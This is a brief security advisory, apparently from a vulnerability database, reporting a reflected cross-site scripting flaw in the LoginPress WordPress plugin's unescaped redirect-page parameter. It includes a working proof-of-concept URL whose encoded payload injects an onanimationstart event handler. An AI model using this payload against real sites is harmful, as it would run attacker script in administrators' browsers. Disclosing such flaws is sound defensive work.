The plugin does not escape the redirect-page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=loginpress-optin.php&redirect-page=%22+style%3Danimation-name%3Arotation%3Bdisplay%3Ablock+onanimationstart%3Dalert%28/XSS/%29+x